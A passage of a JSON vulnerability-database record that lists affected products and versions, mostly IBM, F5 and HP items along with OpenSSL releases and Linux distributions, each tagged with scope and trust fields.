        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.15.1"
      },
      {
        "model": "alienvault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.15.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.210"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "system networking san24b-5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.0.0"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.14"
      },
      {
        "model": "i operating systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.2"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "security network controller 1.0.3381m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "7"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.4"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.9.0"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "tivoli netcool system service monitor fp14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "project openssl 1.0.0f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "project openssl d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "algo one mag",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.8"
      },
      {
        "model": "websphere message broker",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.9"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "tssc/imc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.9.790"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "big-ip aam",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "big-ip asm hf9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.1.730"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.12"
      },
      {
        "model": "sterling connect:direct for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.2.1"
      },
      {
        "model": "cloud manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.2"
      },
      {
        "model": "project openssl 1.0.0j",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.0b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.1"
      },
      {
        "model": "linerate",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.4"
      },
      {
        "model": "big-ip analytics hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-iq adc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.5"
      },
      {
        "model": "screenos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.6"
      },
      {
        "model": "bladecenter t advanced management module 32r0835",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.10.801"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.5"
      },
      {
        "model": "big-ip gtm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip webaccelerator hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "system storage san768b-2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "system storage san06b-r",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "pureapplication system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.1"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.11"
      },
      {
        "model": "lotus protector for mail security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.80"
      },
      {
        "model": "big-ip link controller hf9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "systems insight manager sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "encryption switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5"
      },
      {
        "model": "big-ip aam hf5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip link controller 11.1.0-hf3",
        "scope": null,
        "trust": 0.3,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.0.1"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.2"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.0"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.2"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.5"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.1"
      },
      {
        "model": "big-ip link controller hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1"
      },
      {
        "model": "aspera proxy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.2.3"
      },
      {
        "model": "big-ip asm hf5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.03"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.4.143"
      },
      {
        "model": "cognos controller fp1 if1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "version control repository manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "lotus protector for mail security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.8.1.0"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "big-ip aam",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip afm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.4"
      },
      {
        "model": "project openssl 1.0.1j",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "bladecenter -t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8730"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1.0"
      },
      {
        "model": "cloudbridge",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.7"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.6"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "tivoli workload scheduler for applications fp01",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "abyp-0t-0s-4l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.3.132"
      },
      {
        "model": "big-ip psm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "initiate master data service patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "big-ip edge gateway 11.0.0-hf1",
        "scope": null,
        "trust": 0.3,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.14"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3.0"
      },
      {
        "model": "sterling connect:direct for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.14"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.1"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip asm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip afm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "project openssl 1.0.1d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.13"
      },
      {
        "model": "abyp-2t-2s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.9"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.1"
      },
      {
        "model": "bladecenter -h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7989"
      },
      {
        "model": "abyp-4tl-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.3"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3381"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.0.1.104"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip pem",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "nsm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "bladecenter -ht",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8740"
      },
      {
        "model": "abyp-4ts-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.1"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.11"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2.0.860"
      },
      {
        "model": "icewall mcrp sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1"
      },
      {
        "model": "big-ip apm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3.0"
      },
      {
        "model": "qlogic 8gb intelligent pass-thru module \u0026 san switch module",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.10.1.35.00"
      },
      {
        "model": "infosphere guardium database activity monitoring",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "project openssl 1.0.0p",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.12"
      },
      {
        "model": "big-ip asm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2.09"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.3"
      },
      {
        "model": "big-ip psm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "pulse secure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "system storage san24b-4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "aspera faspex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.7.7"
      },
      {
        "model": "big-ip asm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.0"
      },
      {
        "model": "big-ip apm hf15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "websphere mq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.0"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.8"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "abyp-10g-2sr-2lr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.5.146"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "alienvault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.14"
      },
      {
        "model": "systems insight manager sp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.0.1.73"
      },
      {
        "model": "big-ip gtm hf5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "big-ip link controller 11.1.0-hf2",
        "scope": null,
        "trust": 0.3,
        "vendor": "f5",
        "version": null
      },
      {
        "model": "big-ip analytics",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1.0.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.1.3"
      },
      {
        "model": "project openssl 0.9.8zc",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.0n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.8"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.13"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.0"
      },
      {
        "model": "big-ip webaccelerator hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.5"
      },
      {
        "model": "icewall sso agent option update rele",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.02007"
      },
      {
        "model": "system storage san40b-4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.8"
      },
      {
        "model": "system networking san96b-5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.25"
      },
      {
        "model": "rational developer for i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "big-ip linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.5"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2.0"
      },
      {
        "model": "big-ip webaccelerator hf15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.34"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1841"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3376"
      },
      {
        "model": "endeca server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7.4"
      },
      {
        "model": "messagesight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.010"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "messagesight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0"
      },
      {
        "model": "abyp-4t-0s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "big-ip apm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "flex system fc5022 16gb san scalable switch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.1"
      },
      {
        "model": "project openssl 0.9.8zd",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "tivoli workload scheduler for applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.23"
      },
      {
        "model": "websphere mq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "mac os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.4"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.11"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "arx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "6.1"
      },
      {
        "model": "big-ip analytics hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2"
      },
      {
        "model": "icewall sso dfw r3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.8.179"
      },
      {
        "model": "project openssl 1.0.1k",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
